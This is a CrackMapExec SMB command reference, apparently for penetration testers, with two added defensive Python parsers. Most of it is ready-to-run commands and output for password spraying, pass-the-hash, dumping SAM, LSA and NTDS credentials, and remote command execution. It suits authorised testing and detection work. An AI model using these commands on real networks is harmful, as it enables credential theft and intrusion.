SMB Command Reference
Updated: 7/27/18
CME Version: 4.0.1dev
Notes about command reference:
The following use cases assume you have a Kali Linux host connected to an internal network.
For the examples it is also assumed that hosts are within the 192.168.1.0/24 IP space.
If CME isn't giving output of any kind, there is probably something wrong with the command.
Returns a list of live hosts
#~ cme smb 192.168.1.0/24
Expected Results:
SMB 192.168.1.101 445 DC2012A [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012A) (domain:OCEAN) (signing:True) (SMBv1:True)
SMB 192.168.1.102 445 DC2012B [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012B) (domain:EARTH) (signing:True) (SMBv1:True)
SMB 192.168.1.110 445 DC2016A [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:DC2016A) (domain:OCEAN) (signing:True) (SMBv1:True)
SMB 192.168.1.117 445 WIN10DESK1 [*] WIN10DESK1 x64 (name:WIN10DESK1) (domain:OCEAN) (signing:False) (SMBv1:True)
Maps the network of live hosts and saves a list of only the hosts that don't require SMB signing.
The list format is one IP per line.
#~ cme smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt
Expected Results:
SMB 192.168.1.101 445 DC2012A [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012A) (domain:OCEAN) (signing:True) (SMBv1:True)
SMB 192.168.1.102 445 DC2012B [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012B) (domain:EARTH) (signing:True) (SMBv1:True)
SMB 192.168.1.111 445 SERVER1 [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:SERVER1) (domain:PACIFIC) (signing:False) (SMBv1:True)
SMB 192.168.1.117 445 WIN10DESK1 [*] WIN10DESK1 x64 (name:WIN10DESK1) (domain:OCEAN) (signing:False) (SMBv1:True)
...SNIP...
#~ cat relaylistOutputFilename.txt
192.168.1.111
192.168.1.117
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --shares
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --disks
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --loggedon-users
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --rid-brute
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-groups
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --pass-pol
Failed logins result in a [-].
Successful logins result in a [+] Domain\Username:Password.
Local admin access results in (Pwn3d!) appended after the login confirmation, as shown below.
SMB 192.168.1.101 445 HOSTNAME [+] DOMAIN\Username:Password (Pwn3d!)
The following checks will attempt authentication to the entire /24, though a single target may also be used.
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE'
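The banner and authentication lines described above are easy to parse, which is useful when a scan is run as part of a hardening audit: the hosts without SMB signing are the same set --gen-relay-list writes out, and the hosts still answering SMBv1 should be on the same remediation list. The following parser is an added example written for this page, not code from the CME project; the output it consumes is constructed to match the line shapes shown above (the svc_backup account, the hostnames and the results are made up), and the field layout it relies on is only the one visible in this reference.

```python
import re
from dataclasses import dataclass

# Constructed sample output, modelled on the CME lines shown above (not a real scan).
# Hostnames, domains and the svc_backup account are made up for this example.
SAMPLE_OUTPUT = """\
SMB 192.168.1.101 445 DC2012A [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012A) (domain:OCEAN) (signing:True) (SMBv1:True)
SMB 192.168.1.111 445 SERVER1 [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:SERVER1) (domain:PACIFIC) (signing:False) (SMBv1:True)
SMB 192.168.1.117 445 WIN10DESK1 [*] WIN10DESK1 x64 (name:WIN10DESK1) (domain:OCEAN) (signing:False) (SMBv1:True)
SMB 192.168.1.101 445 DC2012A [-] OCEAN\\svc_backup:Summer18
SMB 192.168.1.111 445 SERVER1 [+] PACIFIC\\svc_backup:Summer18
SMB 192.168.1.117 445 WIN10DESK1 [+] OCEAN\\svc_backup:Summer18 (Pwn3d!)
"""

# Banner line: "[*] <OS string> (name:..) (domain:..) (signing:..) (SMBv1:..)"
BANNER_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[\*\]\s+(?P<os>.*?)\s*"
    r"\(name:(?P<name>[^)]*)\)\s+\(domain:(?P<domain>[^)]*)\)\s+"
    r"\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)\s*$"
)
# Authentication result line: "[+]" or "[-]", then DOMAIN\user:secret, optional "(Pwn3d!)"
AUTH_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[(?P<result>[+-])\]\s+"
    r"(?P<principal>\S+?):(?P<secret>\S+)(?P<admin>\s+\(Pwn3d!\))?\s*$"
)


@dataclass
class Host:
    ip: str
    name: str
    domain: str
    os: str
    signing: bool
    smbv1: bool


@dataclass
class AuthResult:
    ip: str
    host: str
    principal: str
    success: bool
    admin: bool


def parse_cme_output(text):
    """Split CME SMB output into host banners and authentication results."""
    hosts, auths = [], []
    for line in text.splitlines():
        m = BANNER_RE.match(line)
        if m:
            hosts.append(Host(m["ip"], m["name"], m["domain"], m["os"],
                              m["signing"] == "True", m["smbv1"] == "True"))
            continue
        m = AUTH_RE.match(line)
        if m:
            auths.append(AuthResult(m["ip"], m["host"], m["principal"],
                                    m["result"] == "+", m["admin"] is not None))
    return hosts, auths


def signing_not_required(hosts):
    """Hosts that do not require SMB signing: the set --gen-relay-list writes out, and
    the hosts to fix first by enforcing server-side signing through policy
    ('Microsoft network server: Digitally sign communications (always)')."""
    return [h.ip for h in hosts if not h.signing]


def smbv1_enabled(hosts):
    """Hosts still answering SMBv1, which should be disabled alongside signing enforcement."""
    return [h.ip for h in hosts if h.smbv1]


def admin_access(auths):
    """(ip, principal) pairs where the tested credential authenticated with local admin rights."""
    return [(a.ip, a.principal) for a in auths if a.success and a.admin]


if __name__ == "__main__":
    hosts, auths = parse_cme_output(SAMPLE_OUTPUT)
    print("signing not required:", signing_not_required(hosts))
    print("SMBv1 enabled:      ", smbv1_enabled(hosts))
    print("admin access:       ", admin_access(auths))
```

Pipe a saved scan into `parse_cme_output` and the three report functions give the remediation view of the same data the tool prints: which hosts to enforce signing on, which still speak SMBv1, and where a single tested credential turned out to hold local admin.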
After obtaining credentials such as
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c:::
you can use either the full LM:NT hash or just the NT hash (the second half).
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'
#~ cme smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'
#~ cme smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'
#~ cme smb 192.168.1.0/24 -u '' -p ''
If multiple domains are in play you may need to specify the target domain using -d.
For example, authenticating to the domain labnet.com:
#~ cme smb 192.168.1.0/24 -u UserNAme -p "PASSWORDHERE" -d LABNET
You can use multiple usernames or passwords by separating the names/passwords with a space.
#~ cme smb 192.168.1.101 -u user1 user2 user3 -p Summer18
#~ cme smb 192.168.1.101 -u user1 -p password1 password2 password3
CME accepts txt files of usernames and passwords, one user/password per line. Watch out for account lockout!
#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18
#~ cme smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt
*Note*: By default CME will exit after a successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found. Useful for spraying a single password against a large user list. Usage example:
#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18 --continue-on-success
Adding --local-auth to any of the authentication commands will attempt to log on locally.
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth
#~ cme smb 192.168.1.0/24 -u '' -p '' --local-auth
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT' --local-auth
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH' --local-auth
#~ cme smb 192.168.1.0/24 -u localguy -H '13b29964cc2480b4ef454c59562e675c' --local-auth
#~ cme smb 192.168.1.0/24 -u localguy -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' --local-auth
Results will display the hostname next to the user:password.
SMB 192.168.1.101 445 HOSTNAME [+] HOSTNAME\Username:Password (Pwn3d!)
The following examples use a username and plaintext password although user/hash combos work as well.
*Requires Local Admin
***Requires Domain Admin or Local Admin privileges on the target Domain Controller
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
Two methods are available:
(default) drsuapi - Uses the drsuapi RPC interface to create a handle and trigger replication, combined with additional drsuapi calls to convert the resulting linked lists into a readable format
vss - Uses the Volume Shadow Copy Service
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet
Options for spidering shares of remote systems.
Notice that the '$' character has to be escaped (the example shown can be used as-is in a Kali Linux terminal).
#~ cme smb <IP> -u USER -p PASSWORD --spider C\$ --pattern txt
Options for executing commands on remote systems.
CME has three different command execution methods:
- wmiexec: executes commands via WMI
- atexec: executes commands by scheduling a task with Windows Task Scheduler
- smbexec: executes commands by creating and running a service
By default CME will fail over to a different execution method if one fails. It attempts to execute commands in the following order:
- wmiexec
- atexec
- smbexec
If you want to force CME to use only one execution method you can specify which one using the --exec-method flag.
The command execution method is denoted in the Executed Command output line.
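Each of the three execution methods leaves a different host-side artifact, which is what a defender keys on: smbexec installs a service whose binary path is a command line, atexec registers a scheduled task whose action is a shell, and wmiexec spawns its shell under the WMI provider host. The triage function below is an added example written for this page, not part of CME. The event records are constructed in the shape a SIEM would expose, and the field names (ImagePath, Command, Image, ParentImage) are assumptions about that export; the event IDs are the standard Windows ones (System 7045 for a service installation, Security 4698 for scheduled task creation, Sysmon 1 for process creation).

```python
import re

# Constructed sample events shaped like SIEM-normalised Windows records; the field
# names are an assumption about the export format and the values are invented.
SAMPLE_EVENTS = [
    # System 7045 (service installed): the smbexec pattern is a service whose binary
    # path is a shell command line instead of a real executable.
    {"channel": "System", "event_id": 7045, "host": "WIN7BOX",
     "ServiceName": "Xk7Qp", "ImagePath": r"%COMSPEC% /Q /c whoami > C:\Windows\Temp\o.txt 2>&1"},
    # Security 4698 (scheduled task created): the atexec pattern is a task whose
    # action launches a shell.
    {"channel": "Security", "event_id": 4698, "host": "WIN7BOX",
     "TaskName": r"\ZxQpL", "Command": "cmd.exe", "Arguments": r"/C whoami > C:\Windows\Temp\o.txt 2>&1"},
    # Sysmon 1 (process created): the wmiexec pattern is a shell whose parent is the
    # WMI provider host, WmiPrvSE.exe.
    {"channel": "Sysmon", "event_id": 1, "host": "WIN7BOX",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "cmd.exe /Q /c whoami"},
    # Benign noise that must not fire: a normal service binary and a normal process tree.
    {"channel": "System", "event_id": 7045, "host": "WIN7BOX",
     "ServiceName": "Spooler2", "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"channel": "Sysmon", "event_id": 1, "host": "WIN7BOX",
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

# A "shell" for our purposes: %COMSPEC%, cmd(.exe) or powershell(.exe) anywhere in the field.
SHELL_RE = re.compile(r"(%COMSPEC%|\bcmd(\.exe)?\b|\bpowershell(\.exe)?\b)", re.IGNORECASE)


def classify(event):
    """Return the CME execution method whose artifact this event resembles, or None."""
    eid, chan = event.get("event_id"), event.get("channel")
    if chan == "System" and eid == 7045:
        # smbexec: the command runs as the binary path of a freshly installed service
        if SHELL_RE.search(event.get("ImagePath", "")):
            return "smbexec"
    elif chan == "Security" and eid == 4698:
        # atexec: the command is the action of a newly created scheduled task
        if SHELL_RE.search(event.get("Command", "")):
            return "atexec"
    elif chan == "Sysmon" and eid == 1:
        # wmiexec: a shell spawned directly by the WMI provider host
        parent = event.get("ParentImage", "").lower()
        if parent.endswith("\\wmiprvse.exe") and SHELL_RE.search(event.get("Image", "")):
            return "wmiexec"
    return None


def triage(events):
    """(host, method, event_id) for every event that matches one of the three patterns."""
    hits = []
    for e in events:
        method = classify(e)
        if method:
            hits.append((e["host"], method, e["event_id"]))
    return hits


if __name__ == "__main__":
    for host, method, eid in triage(SAMPLE_EVENTS):
        print(f"{host}: event {eid} looks like {method}")
```

The useful property of the fail-over order described above is that a blocked method does not make the activity quieter: if WMI is denied, the same command reappears as a scheduled task, and then as a service, so all three artifact types belong in the same alert group.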
wmiexec example; note the 'Executed command via wmiexec' output line.
root@EvilRick:~# cme smb 10.10.33.121 -u Administrator -p AAdmin\!23 -X '$PSVersionTable' --exec-method wmiexec
SMB 10.10.33.121 445 DESKTOP1 [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:DESKTOP1) (domain:PACIFIC) (signing:False) (SMBv1:True)
SMB 10.10.33.121 445 DESKTOP1 [+] PACIFIC\Administrator:AAdmin!23 (Pwn3d!)
SMB 10.10.33.121 445 DESKTOP1 [+] Executed command via wmiexec
SMB 10.10.33.121 445 DESKTOP1 Name Value
SMB 10.10.33.121 445 DESKTOP1 ---- -----
SMB 10.10.33.121 445 DESKTOP1 CLRVersion 2.0.50727.8793
SMB 10.10.33.121 445 DESKTOP1 BuildVersion 6.1.7601.17514
SMB 10.10.33.121 445 DESKTOP1 PSVersion 2.0
SMB 10.10.33.121 445 DESKTOP1 WSManStackVersion 2.0
SMB 10.10.33.121 445 DESKTOP1 PSCompatibleVersions {1.0, 2.0}
SMB 10.10.33.121 445 DESKTOP1 SerializationVersion 1.1.0.1
SMB 10.10.33.121 445 DESKTOP1 PSRemotingProtocolVersion 2.1
In the following example, we try to execute whoami on the target using the -x flag:
#~ crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami
SMB 192.168.10.11 445 WIN7BOX [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:WIN7BOX) (domain:LAB) (signing:False) (SMBv1:True)
SMB 192.168.10.11 445 WIN7BOX [+] LAB\Administrator:P@ssw0rd (Pwn3d!)
SMB 192.168.10.11 445 WIN7BOX [+] Executed command
SMB 192.168.10.11 445 WIN7BOX lab\administrator
You can also directly execute PowerShell commands using the -X flag:
#~ crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'
SMB 192.168.10.11 445 WIN7BOX [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:WIN7BOX) (domain:LAB) (signing:False) (SMBv1:True)
SMB 192.168.10.11 445 WIN7BOX [+] LAB\Administrator:P@ssw0rd (Pwn3d!)
SMB 192.168.10.11 445 WIN7BOX [+] Executed command
SMB 192.168.10.11 445 WIN7BOX Name Value
SMB 192.168.10.11 445 WIN7BOX ---- -----
SMB 192.168.10.11 445 WIN7BOX CLRVersion 2.0.50727.8793
SMB 192.168.10.11 445 WIN7BOX BuildVersion 6.1.7601.17514
SMB 192.168.10.11 445 WIN7BOX PSVersion 2.0
SMB 192.168.10.11 445 WIN7BOX WSManStackVersion 2.0
SMB 192.168.10.11 445 WIN7BOX PSCompatibleVersions {1.0, 2.0}
SMB 192.168.10.11 445 WIN7BOX SerializationVersion 1.1.0.1
SMB 192.168.10.11 445 WIN7BOX PSRemotingProtocolVersion 2.1
PowerShell commands can be forced to run in a 32-bit process:
#~ crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '[System.Environment]::Is64BitProcess' --force-ps32
SMB 192.168.10.11 445 WIN7BOX [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:WIN7BOX) (domain:LAB) (signing:False) (SMBv1:True)
SMB 192.168.10.11 445 WIN7BOX [+] LAB\Administrator:P@ssw0rd (Pwn3d!)
SMB 192.168.10.11 445 WIN7BOX [+] Executed command
SMB 192.168.10.11 445 WIN7BOX false
Other switches include:
--no-output Does not retrieve command results
See more about WMI queries and syntax here: https://docs.microsoft.com/en-us/windows/desktop/wmisdk/invoking-a-synchronous-query
User/Password
#~ cme smb 10.10.33.121 -u Administrator -p 'P@ssw0rd' --wmi "SELECT * FROM Win32_logicalDisk WHERE DeviceID = 'C:'"
SMB 192.168.10.11 445 WIN7BOX [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:WIN7BOX) (domain:LAB) (signing:False) (SMBv1:True)
SMB 192.168.10.11 445 WIN7BOX [+] LAB\Administrator:P@ssw0rd (Pwn3d!)
SMB 192.168.10.11 445 WIN7BOX Caption => C:
SMB 192.168.10.11 445 WIN7BOX Description => Local Fixed Disk
SMB 192.168.10.11 445 WIN7BOX InstallDate => 0
SMB 192.168.10.11 445 WIN7BOX Name => C:
SMB 192.168.10.11 445 WIN7BOX Status => 0
SMB 192.168.10.11 445 WIN7BOX Availability => 0
SMB 192.168.10.11 445 WIN7BOX CreationClassName => Win32_LogicalDisk
SMB 192.168.10.11 445 WIN7BOX ConfigManagerErrorCode => 0
SMB 192.168.10.11 445 WIN7BOX ConfigManagerUserConfig => 0
SMB 192.168.10.11 445 WIN7BOX DeviceID => C:
- Spidering shares needs updates for the different available flags.
- PowerShell script obfuscation switches: --obfs and --clear-obfscripts
- SMB modules: probably will create a separate section.
- Figure out what the wmi-namespace change is about and why it is needed.
User/Password
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --wmi-namespace 'root\\cimv2'